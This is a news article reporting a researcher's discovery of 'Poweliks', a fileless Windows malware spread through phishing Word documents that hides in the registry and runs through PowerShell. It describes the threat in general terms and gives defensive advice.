Late last week, researcher Paul Rascagneres announced the discovery of a new strain of Windows malware in his blog on GData.com, one which requires no installation on behalf of the user, and can operate entirely out of the registry while avoiding detection by many of the most popular anti-virus programs on the market today.
Downloaded through standard email phishing channels, the virus is contained within a corrupted Microsoft Word document that launches a hidden autostart registry key.
After that portion of the payload is established, the malware is able to create and execute a custom shellcode along with a Windows binary file that can snake its way into the deeper sections of the operating system totally undisturbed by classical methods of threat detection available to the wider consumer market.
Rascagneres goes into specific detail about how an affected computer is infected from the inside out, and warns that if a solution is not found soon, we may see this particular strain spread much faster and farther than any that’s come before it.
“PowerShell runs the encoded script containing the malware’s executable code (which is also a .DLL) responsible for downloading other malicious files onto the infected system. This technique is done as part of its evasion tactic since it will not be directly executed by windows or any application.”
It’s the malware’s ability to run without any previous installation required that makes it especially unique/devious, and what has Rascagneres concerned the most. Called “Poweliks” virus based on the TROJ_POWELIKS code found within the file itself, many researchers are worried that the virus could spread exceptionally further than most due to its unique path of entry and nearly undetectable presence once it’s found its way onto an unsuspecting user’s machine.
“Attackers are able to circumvent classic anti-malware file scan techniques with such an approach and are able to carry out any desired action when they reach the innermost layer of [a computer], even after a system re-boot.
No one has come forward yet with details that might shed some light on where the malware was sourced from, though Rascagneres believes it could have been the concerted effort of several different prominent hacking circles based on the fresh attack vector, as well as the advanced nature of the code contained within the virus itself.
Unfortunately, he couldn’t provide any steps for protecting yourself that would be worthy enough to mention, given the uncommon style through which the virus launches on your computer. However, he also believes it won’t be long before AV companies create a custom detection pathway capable of stopping these types of attacks before they have a chance to do any serious damage to the average user’s machine.
“To prevent attacks like this, anti-virus solutions have to either catch the initial Word document before it is executed (if there is one), preferably before it reached the customer’s email inbox.”
Until then, the best option available is for IT admins to perform regular memory analysis sweeps to catch the bug while it’s still alive in a system’s registry, and to be extra cautious of any Word documents that are downloaded through email until a more concrete solution can be found, patched, and distributed to the internet at large.